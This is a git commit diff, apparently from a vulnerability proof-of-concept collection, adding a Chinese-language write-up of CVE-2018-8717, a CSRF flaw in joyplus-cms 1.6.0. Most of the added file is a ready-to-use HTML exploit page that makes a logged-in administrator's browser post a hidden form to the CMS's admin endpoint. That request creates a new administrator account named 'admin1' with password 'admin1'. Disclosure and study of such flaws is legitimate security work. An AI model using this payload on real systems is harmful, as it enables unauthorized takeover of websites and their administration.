reorganize: create iot/, web/, privesc/, pc/ dirs and move loose md files

Co-authored-by: Mr-xn <18260135+Mr-xn@users.noreply.github.com>
2026-05-09 14:27:36 +08:00 · 2026-03-06 13:16:28 +00:00
parent 4c23abe08e
commit 7f075b99f4
81 changed files with 74 additions and 74 deletions
@@ -0,0 +1,28 @@
+### 漏洞简介  
+
+|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
+--------|--------|---------|--------|-------|----|------|
+|joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户|2018-03-14|yx（yx@5ecurity.cn）|[https://github.com/joyplus/joyplus-cms/](https://github.com/joyplus/joyplus-cms/) | [https://github.com/joyplus/joyplus-cms/](https://github.com/joyplus/joyplus-cms/) |1.6.0 | [CVE-2018-8717](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8717)|  
+
+#### 漏洞概述  
+
+> joyplus-cms 1.6.0存在CSRF漏洞，当管理员登陆后访问下面CSRF测试页面可将普通用户提成为管理员权限。joyplus-cms是一个在github上开源的CMS系统，漏洞发现者已经将漏洞信息通过[issues](https://github.com/joyplus/joyplus-cms/issues/419)告知作者。  
+
+### POC实现代码如下：  
+
+> CSRF测试页面代码如下：
+``` html
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://192.168.126.129/joyplus-cms-master/joyplus-cms/manager/admin_ajax.php?action=save&tab={pre}manager" method="POST">
+      <input type="hidden" name="m&#95;id" value="" />
+      <input type="hidden" name="flag" value="add" />
+      <input type="hidden" name="m&#95;name" value="admin1" />
+      <input type="hidden" name="m&#95;password" value="admin1" />
+      <input type="hidden" name="m&#95;status" value="1" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+```